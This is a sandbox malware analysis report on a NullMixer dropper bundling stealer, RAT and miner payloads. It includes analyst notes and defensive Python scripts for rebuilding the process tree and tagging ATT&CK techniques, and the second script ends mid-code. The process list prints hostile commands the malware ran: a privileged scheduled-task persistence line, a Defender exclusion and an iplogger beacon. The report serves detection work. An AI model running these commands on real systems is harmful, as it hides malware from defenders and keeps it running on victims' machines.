Malware Analysis Report

2025-01-02 06:04

Sample ID 241206-pdd5zasnfp
Target cceff411feab78a02a22744e2eae9ab8_JaffaCakes118
SHA256 cfdcbcca4f75f287d6389cda895571530ddb9a2bbdf54cce52c1c65e969ac0a3
Tags
nullmixer privateloader redline sectoprat vidar xmrig build1 aspackv2 discovery dropper execution infostealer loader miner persistence rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview
MITRE ATT&CK - Enterprise Matrix V15
Analysis: static1 - Detonation Overview, Signatures
Analysis: behavioral4 - Detonation Overview, Command Line, Signatures, Processes, Network, Files
Analysis: behavioral1 - Detonation Overview, Command Line, Signatures, Processes, Network, Files
Analysis: behavioral2 - Detonation Overview, Command Line, Signatures, Processes, Network, Files
Analysis: behavioral3 - Detonation Overview, Command Line, Signatures, Processes, Network, Files

Analysis Overview

score
10/10

SHA256

cfdcbcca4f75f287d6389cda895571530ddb9a2bbdf54cce52c1c65e969ac0a3

Threat Level: Known bad

The file cceff411feab78a02a22744e2eae9ab8_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

SectopRAT

PrivateLoader

Vidar family

RedLine payload

Sectoprat family

xmrig

Xmrig family

Nullmixer family

Redline family

Privateloader family

SectopRAT payload

RedLine

Vidar

NullMixer

XMRig Miner payload

Vidar Stealer

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

Loads dropped DLL

ASPack v2.12-2.42

Checks computer location settings

Reads user/profile data of web browsers

Looks up external IP address via web service

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Drops file in Windows directory

Browser Information Discovery

Enumerates physical storage devices

Program crash

Unsigned PE

System Location Discovery: System Language Discovery

Enumerates system info in registry

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Modifies system certificate store

Suspicious use of WriteProcessMemory

Checks SCSI registry key(s)

Uses Task Scheduler COM API

Suspicious use of SendNotifyMessage

Scheduled Task/Job: Scheduled Task

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Modifies Internet Explorer settings

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-12-06 12:12

Signatures

Unsigned PE

Description Indicator Process Target
(2 hits, all fields N/A)

Analysis: behavioral4

Detonation Overview

Submitted

2024-12-06 12:12

Reported

2024-12-06 12:15

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

Signatures

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
(1 hit, all fields N/A)

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
(1 hit, all fields N/A)

Sectoprat family

sectoprat

Vidar

stealer vidar

Vidar family

vidar

Xmrig family

xmrig

xmrig

miner xmrig

Vidar Stealer

stealer
Description Indicator Process Target
(1 hit, all fields N/A)

XMRig Miner payload

miner
Description Indicator Process Target
(10 hits, all fields N/A)

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
(3 hits, all fields N/A)

Checks computer location settings

Description: Key value queried
Indicator: \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation
Process (7 hits, one each; Target N/A):
C:\Users\Admin\AppData\Local\Temp\chrome2.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE
C:\Users\Admin\AppData\Roaming\services64.exe
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\c0f099be1ace2.exe
C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\09b9624c6ac9.exe

Note: Geo\Nation holds the Windows GEOID of the configured country. Reading it is a common loader check for refusing to run on hosts in excluded countries; here it is queried by seven separate stages, from the outer setup_installer.exe down to services64.exe.

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\e4f0738cc5646a38.exe N/A

Note: wextract_cleanup0 is written by the Windows wextract/IExpress self-extractor (IXP000.TMP is its extraction folder) to delete that folder at next logon through advpack.dll DelNodeRunDLL32. It is a side effect of e4f0738cc5646a38.exe being a self-extracting cabinet, not a Run key the malware planted to relaunch itself; the persistence that matters in this run is the services64 scheduled task.

Legitimate hosting services abused for malware hosting/C2

Indicator (hits; Description, Process and Target N/A):
iplogger.org (5)
pastebin.com (2)
raw.githubusercontent.com (2)

Looks up external IP address via web service

Indicator (hits; Description, Process and Target N/A):
ipinfo.io (2)
api.db-ip.com (2)

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1000 set thread context of 4760 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
PID 4604 set thread context of 5580 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe

Note: 1000 -> 4760 is 1cr.exe setting the thread context of a second 1cr.exe, the RunPE pattern of unpacking into a suspended copy of itself. 4604 -> 5580 is services64.exe, the file dropped under AppData\Roaming and registered as the services64 task, setting the thread context of explorer.exe: a cross-image write into a Windows binary that is consistent with process hollowing (T1055.012). The explorer.exe hits under EnumeratesProcesses and AdjustPrivilegeToken belong to that hollowed instance, not to the real shell.

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened for modification C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Note: setup.exe copies itself into C:\Windows under a driver-like name; writing there needs administrator rights, which the sandbox grants. The Processes list shows the copy running as C:\Windows\winnetdriv.exe, so that path is a file-system indicator worth checking on any host that ran this installer.

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description: Key opened
Indicator: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Process (hits; Target N/A):
C:\Windows\SysWOW64\cmd.exe (10)
C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\c0f099be1ace2.exe (1)
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe (2)
C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe (1)
C:\Users\Admin\AppData\Local\Temp\setup.exe (1)
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE (1)
C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\3d1f9c2a6.exe (1)
C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\621c13b77.exe (1)
C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\09b9624c6ac9.exe (2)
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (1)
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe (1)
C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\d55cc0d45c3a05.exe (1)
C:\Windows\winnetdriv.exe (1)

Note: every one of the ten cmd.exe instances launched with /c reads this key, so the cmd.exe and powershell.exe hits are low-signal; the dropper and payload hits are what this signature is meant to surface.

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\3d1f9c2a6.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\3d1f9c2a6.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\3d1f9c2a6.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Process (hits; Description, Indicator and Target N/A):
C:\Windows\system32\schtasks.exe (2)

Suspicious behavior: EnumeratesProcesses

Process (hits; Description, Indicator and Target N/A):
C:\Users\Admin\AppData\Local\Temp\chrome2.exe (2)
C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\d55cc0d45c3a05.exe (24)
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (3)
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (4)
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe (2)
C:\Users\Admin\AppData\Roaming\services64.exe (2)
C:\Windows\explorer.exe (27)

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\caa4baaf544.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\6f1aa71747b4a291.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A (2 hits)

Note: SeDebugPrivilege is what the stealer and RAT stages need to open other processes. SeLockMemoryPrivilege enables large pages and is requested by XMRig to back its RandomX dataset; the real explorer.exe has no reason to ask for it, so its appearance here, after services64.exe set explorer.exe's thread context, indicates the miner is running hollowed inside explorer.exe.

Suspicious use of FindShellTrayWindow

Process (hits; Description, Indicator and Target N/A):
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (25)

Suspicious use of SendNotifyMessage

Process (hits; Description, Indicator and Target N/A):
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (24)

Suspicious use of WriteProcessMemory

Description Process Target (hits; the Indicator column is N/A throughout)
PID 972 wrote to memory of 3016 C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe (3)
PID 3016 wrote to memory of 1112 C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe (3)
PID 3016 wrote to memory of 1324 C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe (3)
PID 3016 wrote to memory of 3844 C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe (3)
PID 3016 wrote to memory of 2544 C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe (3)
PID 3016 wrote to memory of 1772 C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe (3)
PID 3016 wrote to memory of 264 C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe (3)
PID 3016 wrote to memory of 2704 C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe (3)
PID 3016 wrote to memory of 3692 C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe (3)
PID 3016 wrote to memory of 2088 C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe (3)
PID 3692 wrote to memory of 3616 C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\e4f0738cc5646a38.exe (2)
PID 1324 wrote to memory of 3252 C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\c0f099be1ace2.exe (3)
PID 3844 wrote to memory of 4876 C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\caa4baaf544.exe (2)
PID 2704 wrote to memory of 3312 C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\3d1f9c2a6.exe (3)
PID 1112 wrote to memory of 4800 C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\6f1aa71747b4a291.exe (2)
PID 3616 wrote to memory of 1000 C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\e4f0738cc5646a38.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe (3)
PID 2544 wrote to memory of 2732 C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\24ebc9ce784c63.exe (2)
PID 264 wrote to memory of 2380 C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\621c13b77.exe (3)
PID 1772 wrote to memory of 2644 C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\d55cc0d45c3a05.exe (3)
PID 2088 wrote to memory of 3648 C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\09b9624c6ac9.exe (3)
PID 3252 wrote to memory of 1004 C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\c0f099be1ace2.exe C:\Users\Admin\AppData\Local\Temp\chrome2.exe (2)
PID 3252 wrote to memory of 1320 C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\c0f099be1ace2.exe C:\Users\Admin\AppData\Local\Temp\setup.exe (3)
PID 3648 wrote to memory of 4756 C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\09b9624c6ac9.exe C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\09b9624c6ac9.exe (3)
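The WriteProcessMemory and SetThreadContext tables above flatten the whole process tree into one row per parent/child pair. The following Python, added here as a worked example and not part of the sandbox's own tooling, parses rows in exactly that printed layout, rebuilds the tree, and labels each thread-context write as either the RunPE self-injection seen in 1cr.exe or the cross-image hollowing seen in services64.exe -> explorer.exe. The ROWS sample is copied from this report but trimmed to one row per pair; the assumption that every dropper-spawned child appears as a WriteProcessMemory row holds for this report's tables and is stated in the code.

```python
"""Rebuild the process tree from a sandbox report's flattened WriteProcessMemory /
SetThreadContext rows and label every thread-context write.
Added example written for this report; it is not the sandbox's own tooling."""
import ntpath
import re
from collections import defaultdict
from typing import Dict, List, NamedTuple

# Constructed sample input: rows copied from this report's two tables in their
# printed layout (Description, Indicator=N/A, Process, Target), trimmed to one
# row per pair.  No path here contains a space, which the regex relies on.
ROWS = r"""
PID 972 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe
PID 3016 wrote to memory of 3692 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3016 wrote to memory of 1324 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3692 wrote to memory of 3616 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\e4f0738cc5646a38.exe
PID 3616 wrote to memory of 1000 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\e4f0738cc5646a38.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
PID 1324 wrote to memory of 3252 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\c0f099be1ace2.exe
PID 3252 wrote to memory of 1320 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\c0f099be1ace2.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 1000 set thread context of 4760 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
PID 4604 set thread context of 5580 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe
"""

ROW_RE = re.compile(
    r"^PID (?P<src>\d+) (?P<verb>wrote to memory of|set thread context of) "
    r"(?P<dst>\d+) N/A (?P<src_img>\S+) (?P<dst_img>\S+)$"
)


class Event(NamedTuple):
    src: int
    dst: int
    verb: str  # "write" (WriteProcessMemory) or "setctx" (SetThreadContext)
    src_img: str
    dst_img: str


def parse_rows(text: str) -> List[Event]:
    """Parse table rows; headers, blank lines and all-N/A rows are skipped."""
    events = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m is None:
            continue
        verb = "setctx" if m["verb"].startswith("set") else "write"
        events.append(Event(int(m["src"]), int(m["dst"]), verb, m["src_img"], m["dst_img"]))
    return events


def build_tree(events):
    """Parent -> children and PID -> image maps from the WriteProcessMemory rows.
    Assumption specific to this report: every child a dropper spawned shows up
    as such a row, so the rows double as the process tree."""
    children: Dict[int, List[int]] = defaultdict(list)
    names: Dict[int, str] = {}
    for e in events:
        if e.verb != "write":
            continue
        names[e.src], names[e.dst] = e.src_img, e.dst_img
        if e.dst not in children[e.src]:
            children[e.src].append(e.dst)
    return children, names


def roots(children):
    """PIDs that are parents but never children."""
    every_child = {c for cs in children.values() for c in cs}
    return [p for p in children if p not in every_child]


def render(children, names, pid, depth=0, out=None):
    """Indented tree, two spaces per level: basename (PID)."""
    if out is None:
        out = []
    out.append("  " * depth + f"{ntpath.basename(names[pid])} ({pid})")
    for child in children.get(pid, []):
        render(children, names, child, depth + 1, out)
    return out


def classify_thread_context(events):
    """Label each SetThreadContext row: same image on both sides is the RunPE
    pattern (a suspended copy of itself); a target under C:\\Windows is hollowing."""
    findings = {}
    for e in events:
        if e.verb != "setctx":
            continue
        if ntpath.basename(e.src_img).lower() == ntpath.basename(e.dst_img).lower():
            kind = "self: thread context set in a suspended copy of itself"
        elif e.dst_img.lower().startswith("c:\\windows\\"):
            kind = "hollow: thread context set in a Windows binary"
        else:
            kind = "other: thread context set in an unrelated image"
        findings[(e.src, e.dst)] = kind
    return findings


def orphan_pids(events, names):
    """PIDs from SetThreadContext rows with no parent/child row: the sandbox did
    not record who started them (here services64.exe and both injection targets)."""
    seen = {p for e in events if e.verb == "setctx" for p in (e.src, e.dst)}
    return seen - set(names)


if __name__ == "__main__":
    ev = parse_rows(ROWS)
    ch, nm = build_tree(ev)
    print("\n".join(render(ch, nm, roots(ch)[0])))
    print(classify_thread_context(ev), sorted(orphan_pids(ev, nm)))
```

The orphan check is the part worth keeping: services64.exe (4604) has no parent row in either table, so the tree alone would not tell you how the miner stage was started, and the injection target PIDs 4760 and 5580 never appear as children because SetThreadContext, not WriteProcessMemory, is what the sandbox logged for them.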

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 6f1aa71747b4a291.exe

Note: for these launches the image is reported as C:\Windows\SysWOW64\cmd.exe while the command line names system32: a 32-bit parent asking for C:\Windows\system32 is redirected to SysWOW64 by WOW64 file-system redirection. The same applies to the powershell.exe entry; it is not a sign of tampering.

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c c0f099be1ace2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c caa4baaf544.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 24ebc9ce784c63.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c d55cc0d45c3a05.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 621c13b77.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 3d1f9c2a6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c e4f0738cc5646a38.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 09b9624c6ac9.exe

C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\e4f0738cc5646a38.exe

e4f0738cc5646a38.exe

C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\caa4baaf544.exe

caa4baaf544.exe

C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\c0f099be1ace2.exe

c0f099be1ace2.exe

C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\3d1f9c2a6.exe

3d1f9c2a6.exe

C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\6f1aa71747b4a291.exe

6f1aa71747b4a291.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\24ebc9ce784c63.exe

24ebc9ce784c63.exe

C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\621c13b77.exe

621c13b77.exe

C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\d55cc0d45c3a05.exe

d55cc0d45c3a05.exe

C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\09b9624c6ac9.exe

09b9624c6ac9.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3016 -ip 3016

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 556

C:\Users\Admin\AppData\Local\Temp\chrome2.exe

"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\09b9624c6ac9.exe

"C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\09b9624c6ac9.exe" -a

C:\Windows\winnetdriv.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1733487159 0

Note: the image is C:\Windows\winnetdriv.exe but the command line still names the original Temp\setup.exe, so image path and command line disagree and matching on the command line alone would miss the Windows-directory copy. The first argument, 1733487159, is a Unix timestamp for 2024-12-06 12:12:39 UTC, matching the submission time in the Detonation Overview: the copy is handed its own install time.

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3312 -ip 3312

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3312 -s 356

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2380 -ip 2380

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2380 -s 1072

Note: the WerFault.exe entries are Windows Error Reporting handling crashes of PIDs 3016 (setup_install.exe), 3312 (3d1f9c2a6.exe) and 2380 (621c13b77.exe); this is what the Program crash signature records, and those three stages may not have run to completion in this sandbox.

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

Note: this is the persistence for the miner stage: an on-logon task named services64, created with /rl highest so it runs with the elevated token at every logon without a UAC prompt, pointing at an executable in AppData\Roaming. A task named like a system service whose action lives outside C:\Windows is the detection; on a live host it shows up in schtasks /query /v /tn services64 and as Security event 4698 (scheduled task created) when object-access auditing is enabled.

C:\Users\Admin\AppData\Roaming\services64.exe

"C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"

Note: Add-MpPreference -ExclusionPath excludes the 1cr.exe stage from Microsoft Defender scanning (Impair Defenses: Disable or Modify Tools, T1562.001). It needs administrator rights, which the sandbox grants; the exclusion outlives the process and is listed on a host by Get-MpPreference | Select-Object -ExpandProperty ExclusionPath.

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7zS76B2.tmp\Install.cmd" "

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/16B4c7

Note: the dropper opens the victim's default browser on an iplogger.org short link. This is install tracking, the operator counting infections and collecting the victim's IP and user agent, not command and control; the msedge.exe child processes that follow, and the msedge.exe hits under EnumeratesProcesses, FindShellTrayWindow and SendNotifyMessage, are ordinary browser behaviour triggered by this launch.
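The Processes list above is where this run's key behaviours are visible as plain command lines: the hex-named stages launched through cmd /c, the services64 task, the Defender exclusion, the renamed setup.exe copy and the iplogger beacon. The following Python, an added example rather than the sandbox's signature engine, runs a small rule set over (image path, command line) pairs taken from that list and maps hits to ATT&CK technique IDs. The IDs are the closest Enterprise mappings chosen for this example, the thresholds (eight or more hex characters in a dropper name, the tracking-service list) are this example's assumptions, and the second Edge entry is trimmed to a few of its real arguments.

```python
"""Run a small rule set over (image path, command line) pairs from a sandbox
Processes list and map each hit to an ATT&CK technique ID.
Added example for this report, not the sandbox's signature engine."""
import ntpath
import re
from datetime import datetime, timezone
from typing import Callable, List, NamedTuple, Tuple

# Constructed sample: pairs copied from this report's Processes list; the last
# Edge entry is trimmed to a few of its arguments.
PROCESSES: List[Tuple[str, str]] = [
    (r"C:\Windows\SysWOW64\cmd.exe",
     r"C:\Windows\system32\cmd.exe /c e4f0738cc5646a38.exe"),
    (r"C:\Windows\winnetdriv.exe",
     r'"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1733487159 0'),
    (r"C:\Windows\System32\cmd.exe",
     r'''"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit'''),
    (r"C:\Windows\system32\schtasks.exe",
     r'''schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' '''),
    (r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"'),
    (r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/16B4c7'),
    (r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --mojo-platform-channel-handle=2144 /prefetch:2'),
]


class Rule(NamedTuple):
    technique: str
    title: str
    match: Callable[[str, str], bool]  # (image path, command line) -> hit


def _has(text: str, *needles: str) -> bool:
    low = text.lower()
    return all(n.lower() in low for n in needles)


def first_token(cmdline: str) -> str:
    """The executable as written in the command line, quoted or not."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end > 0 else s[1:]
    return s.split(None, 1)[0]


def _stem(path: str) -> str:
    """Basename without .exe, lower-cased.  Comparing stems only is deliberate:
    a SysWOW64 image with a system32 command line is WOW64 redirection, not spoofing."""
    base = ntpath.basename(path).lower()
    return base[:-4] if base.endswith(".exe") else base


HEX_DROPPER = re.compile(r'cmd\.exe"?\s+/c\s+[0-9a-f]{8,}\.exe', re.I)  # threshold assumed
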